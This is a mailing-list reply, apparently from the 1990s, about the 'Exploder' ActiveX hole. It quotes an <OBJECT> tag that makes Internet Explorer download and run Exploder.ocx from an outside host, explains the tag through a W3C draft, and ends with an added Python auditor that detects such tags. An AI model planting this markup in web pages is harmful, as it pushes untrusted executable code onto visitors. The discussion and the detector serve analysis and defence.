
Re: ActiveX security hole reported.



> This stuff, though:
> 
> <A HREF="http://home.netscape.com/comprod/mirror/index.htm">
> <OBJECT ID="Exploder1" WIDTH=86 HEIGHT=31
>  CODEBASE="http://www.halcyon.com/mclain/ActiveX/Exploder.ocx"
>  CLASSID="CLSID:DE70D9E3-C55A-11CF-8E43-780C02C10128">
>     <PARAM NAME="_Version" VALUE="65536">
>     <PARAM NAME="_ExtentX" VALUE="2646">
>     <PARAM NAME="_ExtentY" VALUE="1323">
>     <PARAM NAME="_StockProps" VALUE="0">
> <IMG SRC="../../images/now20_button.gif" WIDTH=88 HEIGHT=31></OBJECT></A>
> 
> is new to me.  It seems to be instructing IE to download
> the Exploder.ocx binary, and run it (after giving the user
> some little popup warnings to make sure he didn't click
> by accident).  Does anyone have a pointer to the semantics
> of this sort of <OBJECT> tag?

See the W3C draft at:

http://www.w3.org/pub/WWW/TR/WD-object

To quote from it:

- -
Developers have been experimenting with ideas for dealing
with new media: Microsoft's DYNSRC attribute for video and
audio, Netscape's EMBED tag for compound document
embedding, and Sun's APP and APPLET tags for executable
code. 

Each of these proposed solutions attacks the problem from a
slightly different perspective, and on the surface are each very
different. In addition, each of these proposals falls short, in
one way or another, of meeting the requirements of the Web
community as a whole. However, we believe that this problem
can be addressed with a single extension that addresses all of
the current needs, and is fully extensible for the future. 

This specification defines a new tag <OBJECT> which
subsumes the role of the IMG tag, and provides a general
solution for dealing with new media, while providing for
effective backwards compatibility with existing browsers.
OBJECT allows the HTML author to specify the data, and/or
properties/parameters for initializing objects to be inserted into
HTML documents, as well as the code that can be used to
display/manipulate that data. Here, the term object is used to
describe the things that people want to place in HTML
documents, but other terms for these things are: components,
applets, plug-ins, media handlers, etc. 
- -

The W3C got input from various vendors in developing this spec.
I think the history of the name of the tag itself is somewhat
confusing, having changed in prior drafts, but the idea of
containing the explosion of special tags that all mean "stick
something here" seems reasonable.

-- 
    Albert Lunde                      Albert-Lunde@nwu.edu
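
An added example, not part of the original message or the W3C draft: a small audit that finds the kind of <OBJECT> tag quoted above, one that names a COM class by CLASSID and gives a CODEBASE to fetch the component from. The names `audit`, `ObjectAudit` and `BINARY_EXTS`, the extension list, and the placeholder page URL are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Extensions of native-code components an OBJECT tag can pull in (assumed list).
BINARY_EXTS = (".ocx", ".cab", ".dll", ".exe")

class ObjectAudit(HTMLParser):
    """Collects <OBJECT> elements that name a COM class and a download location."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":          # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        classid = a.get("classid", "")
        codebase = a.get("codebase", "")
        if not classid.lower().startswith("clsid:"):
            return                   # plain media object, no COM class requested
        url = urljoin(self.page_url, codebase) if codebase else ""
        host = urlparse(url).hostname or ""
        page_host = urlparse(self.page_url).hostname or ""
        self.findings.append({
            "id": a.get("id", ""),
            "clsid": classid[6:].upper(),
            "codebase": url,
            # True when the CODEBASE path points at a native binary
            "binary": urlparse(url).path.lower().endswith(BINARY_EXTS),
            # True when the component is served from a host other than the page's
            "third_party": bool(host) and host != page_host,
        })

def audit(html, page_url):
    parser = ObjectAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: the markup quoted above (PARAMs trimmed); page URL is a placeholder.
SAMPLE = '''<A HREF="http://home.netscape.com/comprod/mirror/index.htm">
<OBJECT ID="Exploder1" WIDTH=86 HEIGHT=31
 CODEBASE="http://www.halcyon.com/mclain/ActiveX/Exploder.ocx"
 CLASSID="CLSID:DE70D9E3-C55A-11CF-8E43-780C02C10128">
    <PARAM NAME="_Version" VALUE="65536">
<IMG SRC="../../images/now20_button.gif" WIDTH=88 HEIGHT=31></OBJECT></A>'''

if __name__ == "__main__":
    for finding in audit(SAMPLE, "http://example.invalid/page.htm"):
        print(finding)
```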

